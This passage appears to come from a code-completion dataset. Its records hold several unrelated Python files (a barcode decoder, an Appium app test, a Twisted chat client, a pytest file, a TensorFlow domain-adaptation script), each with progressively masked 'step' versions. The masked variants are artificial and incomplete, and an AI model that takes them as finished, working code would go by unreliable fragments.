"step-5": "import sys\nsys.stdin = open(\"sample_input_17.txt\",\"r\")\n\nT = int(input())\n\ndef code(N): # 암호코드가 있는 열의 위치를 찾음\n code = []\n for i in range(N-4):\n for j in range(49,53):\n if S[i][j] == \"1\" :\n code = S[i]\n return code\n\ndef code_s(code): # 암호코드의 행 위치를 찾아 슬라이싱\n for x in range(M-1,0,-1):\n if code[x] == \"1\" :\n return code[x-55:x+1]\n\ndef code_c(code_s) : # 암호코드를 7개의 숫자로 슬라이싱하여 해독 정보와 비교\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n*7:(n+1)*7] == numbers[m] :\n lists.append(m) \n return lists # 해독 코드\n\nfor tc in range(T):\n N,M = map(int,input().split())\n S = [input() for _ in range(N)]\n numbers = [\"0001101\",\"0011001\",\"0010011\",\"0111101\",\"0100011\",\n \"0110001\",\"0101111\",\"0111011\",\"0110111\",\"0001011\"]\n\n print(f\"#{tc+1}\",end=\" \")\n if not (sum(code_c(code_s(code(N)))[0:7:2])*3+sum(code_c(code_s(code(N)))[1:8:2]))%10 : # 해독코드 10배수인지 확인\n print(sum(code_c(code_s(code(N))))) # 10배수면 암호코드의 1을 모두 더함\n else : # 아니라면 0\n print(0)\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import math
def solve():
a = int(input())
b = int(input())
return math.sqrt(a * a + b * b)
print(solve())
|
normal
|
{
"blob_id": "a22d38f7e8122d6339d1beab3bf08fa41c36d61d",
"index": 9648,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef solve():\n a = int(input())\n b = int(input())\n return math.sqrt(a * a + b * b)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef solve():\n a = int(input())\n b = int(input())\n return math.sqrt(a * a + b * b)\n\n\nprint(solve())\n",
"step-4": "import math\n\n\ndef solve():\n a = int(input())\n b = int(input())\n return math.sqrt(a * a + b * b)\n\n\nprint(solve())\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import swipe
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):#就诊时间
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间
driver.find_element_by_name('23:00').click()#时间
driver.find_element_by_name('00').click()#分钟
driver.find_element_by_name('15分钟').click()#时长
driver.find_element_by_name('完成').click()
def data(driver):#就诊日期
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期
driver.find_element_by_name('完成').click()
def patient(driver):#患者
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
#driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')
#driver.find_element_by_id('com.dentist.android:id/contactLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):#就诊地点
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点
driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):#治疗项目
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
|
normal
|
{
"blob_id": "02bc97b963b970993fc947cfa41c73230dd4d9e4",
"index": 2649,
"step-1": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\n<mask token>\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-3": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-4": "import swipe\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-5": "import swipe\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):#就诊时间\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间\n driver.find_element_by_name('23:00').click()#时间\n driver.find_element_by_name('00').click()#分钟\n driver.find_element_by_name('15分钟').click()#时长\n driver.find_element_by_name('完成').click()\n\ndef data(driver):#就诊日期\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期\n driver.find_element_by_name('完成').click()\n\ndef patient(driver):#患者\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n #driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')\n #driver.find_element_by_id('com.dentist.android:id/contactLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\ndef site(driver):#就诊地点\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点\n driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\ndef project(driver):#治疗项目\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n\n\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class StdIOFactory(Factory):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
def sendMessage(self, nick, msg):
print('sending', nick, msg)
data = msgpack.packb([nick, msg])
self.transport.write(data)
<|reserved_special_token_0|>
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
def sendMessage(self, nick, msg):
print('sending', nick, msg)
data = msgpack.packb([nick, msg])
self.transport.write(data)
def dataReceived(self, data):
self.unpacker.feed(data)
for msg in self.unpacker:
print('{}: {}'.format(*msg))
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
from __future__ import print_function
import os
from twisted.internet.task import react
from twisted.internet.defer import Deferred, inlineCallbacks
from twisted.internet.protocol import Factory
from twisted.internet.protocol import Protocol
from twisted.internet.endpoints import TCP4ClientEndpoint, connectProtocol
from twisted.protocols.basic import LineReceiver
import msgpack
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
def sendMessage(self, nick, msg):
print("sending", nick, msg)
data = msgpack.packb([nick, msg])
self.transport.write(data)
def dataReceived(self, data):
# ditto to server: go over what about "burst" messages?
# (and do "original" code here at first: msg = msgpack.unpack(data)
self.unpacker.feed(data)
for msg in self.unpacker:
print("{}: {}".format(*msg))
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
from twisted.internet.stdio import StandardIO
class StandardInput(LineReceiver, StandardIO):
'''
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
'''
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
|
flexible
|
{
"blob_id": "532bcf8ae0ee40dc3eb4bd7170acfcb5d21cc4b9",
"index": 1984,
"step-1": "<mask token>\n\n\nclass StdIOFactory(Factory):\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-2": "<mask token>\n\n\nclass ChatClient(Protocol):\n\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n <mask token>\n <mask token>\n\n\nclass StdIOFactory(Factory):\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-3": "<mask token>\n\n\nclass ChatClient(Protocol):\n\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n\n def sendMessage(self, nick, msg):\n print('sending', nick, msg)\n data = msgpack.packb([nick, msg])\n self.transport.write(data)\n <mask token>\n\n\nclass StdIOFactory(Factory):\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-4": "<mask token>\n\n\nclass ChatClient(Protocol):\n\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n\n def sendMessage(self, nick, msg):\n print('sending', nick, msg)\n data = msgpack.packb([nick, msg])\n self.transport.write(data)\n\n def dataReceived(self, data):\n self.unpacker.feed(data)\n for msg in self.unpacker:\n print('{}: {}'.format(*msg))\n\n\nclass StdIOFactory(Factory):\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-5": "from __future__ import print_function\nimport os\n\nfrom twisted.internet.task import react\nfrom twisted.internet.defer import Deferred, inlineCallbacks\n\nfrom twisted.internet.protocol import Factory\nfrom twisted.internet.protocol import Protocol\nfrom twisted.internet.endpoints import TCP4ClientEndpoint, connectProtocol\nfrom twisted.protocols.basic import LineReceiver\n\nimport msgpack\n\n\nclass ChatClient(Protocol):\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n\n def sendMessage(self, nick, msg):\n print(\"sending\", nick, msg)\n data = msgpack.packb([nick, msg])\n self.transport.write(data)\n\n def dataReceived(self, data):\n # ditto to server: go over what about \"burst\" messages?\n # (and do \"original\" code here at first: msg = msgpack.unpack(data)\n self.unpacker.feed(data)\n for msg in self.unpacker:\n print(\"{}: {}\".format(*msg))\n\n\nclass StdIOFactory(Factory):\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\nfrom twisted.internet.stdio import StandardIO\nclass StandardInput(LineReceiver, StandardIO):\n '''\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n '''\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-ids": [
7,
12,
13,
14,
16
]
}
|
[
7,
12,
13,
14,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (
'11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'
), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10',
1, '0')])
def test_soln(inp1, inp2, res):
s = Solution()
assert s(inp1, inp2) == res
<|reserved_special_token_1|>
from soln import Solution
import pytest
@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (
'11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'
), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10',
1, '0')])
def test_soln(inp1, inp2, res):
s = Solution()
assert s(inp1, inp2) == res
<|reserved_special_token_1|>
from soln import Solution
import pytest
@pytest.mark.parametrize(
["inp1", "inp2", "res"],
[
("112", 1, "11"),
("11000002000304", 4, "4"),
("9119801020", 6, "20"),
("111111", 3, "111"),
("1432219", 3, "1219"),
("10200", 1, "200"),
("10", 2, "0"),
("10", 1, "0"),
],
)
def test_soln(inp1, inp2, res):
s = Solution()
assert s(inp1, inp2) == res
|
flexible
|
{
"blob_id": "7eb4efb64a5a5b2e8c2dfa965411ff4c7aad6e35",
"index": 6525,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (\n '11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'\n ), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10', \n 1, '0')])\ndef test_soln(inp1, inp2, res):\n s = Solution()\n assert s(inp1, inp2) == res\n",
"step-3": "from soln import Solution\nimport pytest\n\n\n@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (\n '11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'\n ), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10', \n 1, '0')])\ndef test_soln(inp1, inp2, res):\n s = Solution()\n assert s(inp1, inp2) == res\n",
"step-4": "from soln import Solution\nimport pytest\n\n\n@pytest.mark.parametrize(\n [\"inp1\", \"inp2\", \"res\"],\n [\n (\"112\", 1, \"11\"),\n (\"11000002000304\", 4, \"4\"),\n (\"9119801020\", 6, \"20\"),\n (\"111111\", 3, \"111\"),\n (\"1432219\", 3, \"1219\"),\n (\"10200\", 1, \"200\"),\n (\"10\", 2, \"0\"),\n (\"10\", 1, \"0\"),\n ],\n)\ndef test_soln(inp1, inp2, res):\n s = Solution()\n assert s(inp1, inp2) == res\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import sys
sys.path.append("../")
import numpy as np
import tensorflow as tf
from utils import eval_accuracy_main_cdan
from models import mnist2mnistm_shared_discrepancy, mnist2mnistm_predictor_discrepancy
import keras
import argparse
import pickle as pkl
parser = argparse.ArgumentParser(description='Training', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--USE_POISON', type=int, default=1, help='POISON used or not')
args = parser.parse_args()
USE_POISON = bool(args.USE_POISON)
METHOD = "mcd"
IMG_WIDTH = 28
IMG_HEIGHT = 28
NCH = 3
NUM_CLASSES_MAIN = 2
NUM_CLASSES_DC = 2
EPOCHS = 101
BATCH_SIZE = 64
PLOT_POINTS = 100
NUM_MODELS = 5
ce_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)
shared = [mnist2mnistm_shared_discrepancy([50000, IMG_HEIGHT, IMG_WIDTH, NCH]) for i in range(NUM_MODELS)]
main_classifier_1 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]#48*4*4, 500
main_classifier_2 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]
optimizer_shared = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]
optimizer_main_classifier_1 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]
optimizer_main_classifier_2 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]
@tf.function
def train_discrepancy_1(main_data, main_labels, target_data):
    """MCD step B: update only the two classifier heads of each ensemble member.

    Minimizes the supervised source-domain loss while MAXIMIZING the
    disagreement between the two heads on target-domain data (the
    discrepancy enters the objective with a minus sign). The shared
    feature extractors are not updated in this step.

    Args:
        main_data: batch of labeled source-domain images.
        main_labels: one-hot labels for ``main_data`` (NUM_CLASSES_MAIN wide).
        target_data: batch of unlabeled target-domain images.

    Returns:
        Per-model mean L1 discrepancy between the two heads' softmax
        outputs on the target batch.
    """
    # persistent=True because the tape is queried 2*NUM_MODELS times
    # below (once per classifier head per ensemble member).
    with tf.GradientTape(persistent=True) as tape:
        shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]
        main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
        main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
        # Supervised cross-entropy on the source domain, summed over both heads.
        main_loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]
        shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]
        target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
        target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
        # Mean absolute difference of the two heads' softmax outputs on target data.
        adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for i in range(NUM_MODELS)]
        # Classify source correctly AND disagree on target: loss = main - discrepancy.
        loss = [main_loss[i] - adv_loss[i] for i in range(NUM_MODELS)]
    gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]
    gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]
    [optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]
    [optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]
    # Fix: explicitly release the persistent tape's resources (the original
    # kept it alive until garbage collection).
    del tape
    return adv_loss
@tf.function
def train_discrepancy_2(target_data):
    """MCD step C: update only the shared feature extractors.

    Minimizes the two heads' disagreement on target-domain data, pushing
    target features toward regions where the heads already agree. The
    classifier heads are not updated in this step.

    Args:
        target_data: batch of unlabeled target-domain images.

    Returns:
        Per-model mean L1 discrepancy between the two heads' softmax outputs.
    """
    # persistent=True because tape.gradient is called once per ensemble member.
    with tf.GradientTape(persistent=True) as tape:
        shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]
        target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
        target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
        adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]
    gradients_shared = [tape.gradient(adv_loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]
    [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]
    # Fix: explicitly release the persistent tape's resources (the original
    # kept it alive until garbage collection).
    del tape
    return adv_loss
@tf.function
def train_step_erm(main_data, main_labels):
    """MCD step A: plain supervised (ERM) update of every ensemble member.

    Minimizes the source-domain cross-entropy of both classifier heads and
    backpropagates through the shared feature extractor as well, updating
    all three components of each member.

    Args:
        main_data: batch of labeled source-domain images.
        main_labels: one-hot labels for ``main_data``.

    Returns:
        Per-model summed cross-entropy loss of the two heads.
    """
    # persistent=True because the tape is queried 3*NUM_MODELS times below
    # (extractor + two heads, per ensemble member).
    with tf.GradientTape(persistent=True) as tape:
        shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]
        main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
        main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
        loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]
    gradients_shared = [tape.gradient(loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]
    gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]
    gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]
    [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]
    [optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]
    [optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]
    # Fix: explicitly release the persistent tape's resources (the original
    # kept it alive until garbage collection).
    del tape
    return loss
# ---- Data preparation: MNIST (source) vs MNIST-M (target), binary 3-vs-8 task ----
mnist = tf.keras.datasets.mnist
(x_train_mnist_all, y_train_mnist_all), (x_test_mnist_all, y_test_mnist_all) = mnist.load_data()
# Replicate the grayscale channel 3x so MNIST matches MNIST-M's 3-channel shape; scale to [0, 1].
x_train_mnist_all = np.stack((x_train_mnist_all,)*3, axis=-1)/255.
x_test_mnist_all = np.stack((x_test_mnist_all,)*3, axis=-1)/255.
# Fix: close the pickle file deterministically (the original leaked the
# handle via a bare open() inside pkl.load).
